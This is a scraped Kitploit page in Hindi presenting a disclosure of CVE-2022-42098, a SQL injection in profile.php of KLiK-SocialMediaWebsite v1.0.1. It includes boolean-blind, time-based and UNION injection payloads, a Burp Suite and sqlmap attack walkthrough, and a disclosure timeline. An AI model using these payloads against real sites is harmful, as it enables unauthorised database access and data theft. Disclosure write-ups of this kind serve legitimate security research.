Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 में profile.php पर SQL इंजेक्शन की कमजोरियाँ हैं। | Kitploit
उपकरण/GitHubGitHub/bypazs/cve-2022-42098
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 में profile.php पर SQL इंजेक्शन की कमजोरियाँ हैं।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

KLiK-SocialMediaWebsite संस्करण v1.0.1

भेद्यता स्पष्टीकरण:

KLiK-SocialMediaWebsite v1.0.1 में profile.php पर पैरामीटर id पर SQL इंजेक्शन भेद्यताएं हैं।

हमले के वेक्टर:

KLiK-SocialMediaWebsite v1.0.1 में जब कोई उपयोगकर्ता बनाया जाता है, तो KLiK उपयोगकर्ता पृष्ठ के माध्यम से KLiK पर लोगों को खोजा जा सकता है। profile.php का "id" पैरामीटर मनमाने SQL क्वेरी इंजेक्ट करने के लिए दुरुपयोग किया जा सकता है।

प्रभावित:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

पेलोड:

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

परीक्षण किया गया:

  1. KLiK SocialMediaWebsite संस्करण v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox संस्करण 105

  3. sqlmap संस्करण 1.6.7 स्थिर

हमले के चरण:

  1. उपयोगकर्ता नाम और पासवर्ड से लॉगिन करें।
  2. ऊपरी दाएं कोने में एक व्यक्ति को दर्शाने वाले आइकन पर क्लिक करें।
  3. Burp Suite का उपयोग करके अनुरोध को इंटरसेप्ट करें।
  4. KLiK उपयोगकर्ता पृष्ठ से किसी व्यक्ति के नाम पर क्लिक करके चुनें।
  5. Burp Suite पर वापस आकर, /profile.php पर राइट-क्लिक करें और "Copy to file" चुनें।
  6. अनुरोध फ़ाइल को Kali Linux पर भेजें और इसके साथ sqlmap का उपयोग करें।
  7. id के माध्यम से SQL इंजेक्शन भेद्यता का पता चला।

खोजकर्ता:

:shipit: Grim The Ripper Team by SOSECURE Thailand

माध्यम:

प्रकटीकरण समयरेखा:

  • 2022–09–28: भेद्यता की खोज की गई।
  • 2022–09–28: भेद्यता MITRE निगम को सूचित की गई।
  • 2022–10–15: CVE आरक्षित कर दिया गया है।
  • 2022–10–31: भेद्यता का सार्वजनिक प्रकटीकरण।

संदर्भ:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

टूल डाउनलोड करें